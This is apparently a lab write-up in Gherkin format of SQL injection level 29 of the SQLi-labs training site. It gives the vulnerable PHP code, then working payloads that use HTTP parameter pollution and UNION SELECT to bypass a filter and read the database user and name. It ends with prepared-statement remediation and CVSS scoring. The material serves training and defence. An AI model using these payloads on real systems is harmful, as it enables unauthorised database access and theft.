## Version 2.0
## language: en

Feature: SQL Injection Level 29
  TOE:
    SQLI-labs
  Category:
    SQL Injection -  GET-Error-Based-Impidence-Mismatch
  Location:
    http://localhost/sqlilabs/Less-29/ - id (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check the website vulnerability against SQL Injection
  Recommendation:
    Use prepared statements

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows OS      | 10            |
    | Chrome          | 80.0.3987.100 |
  TOE information:
    Given I am accessing to the website
    And the server is running MySQL version 5.7.28
    And PHP version 5.6.40
    And is running on localhost

  Scenario: Normal use case
    Given I am on the main page
    And I can see the message
    """
    This Site Protected by World's Best Firewall
    """
    When I set the "id" parameter
    """
    ?id=1
    """
    Then A new message appears on the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I set the "id" parameter
    """
    ?id=2
    """
    Then A new message appears on the screen
    """
    Your Login name:Angelina
    Your Password:I-kill-you
    """

  Scenario: Static detection
    Given I access to the source code
    When I check the source code
    Then I can see the related code
    """
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    """
    When I analyze the code
    Then I realize the inputs does not use prepared statements
    And The query is vulnerable to SQL injection

  Scenario: Dynamic detection
    Given I am on the main page
    When I attempt to inject the "id" parameter as
    """
    ?id=1%20and%202=1--+
    """
    Then A message appears on the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I attempt to inject the "id" parameter as
    """
    ?id=1'
    """
    Then I see an error message on the screen
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1'
    at line 1
    """
    When I inject the "id" parameter as
    """
    ?id=1&id=1
    """
    Then A message appears on the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I inject the "id" parameter as
    """
    ?id=1&id=1%20union%20select%201,2,3%20--+
    """
    Then The same message appears on the screen
    When I inject the "id" parameter as
    """
    ?id=1&id=%27%20union%20select%201,2,3%20--+
    """
    Then A new message appears in the screen
    """
    Your Login name:2
    Your Password:3
    """
    And The query is vulnerable to SQL injection

  Scenario: Exploitation
    Given I am on the main page
    And The website is vulnerable to SQL injection
    When I inject the "id" parameter as
    """
    ?id=1&id=%27%20union%20select%201,user(),database()%20--+
    """
    Then A new message appears on the screen [evidence](evidence.png)
    """
    Your Login name:root@localhost
    Your Password:security
    """
    And The query is vulnerable to SQL injection

  Scenario: Remediation
    Given The web site is vulnerable against SQL injection
    And The code does not have prepared statements
    When The web site is using the vulnerable query
    Then The code must be replaced with
    """
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE id=? LIMIT 0,1");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->close();
    """
    And The query could be shielded against SQL injection

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.2/10 (Medium) - E:H/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      5.5/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-03-06
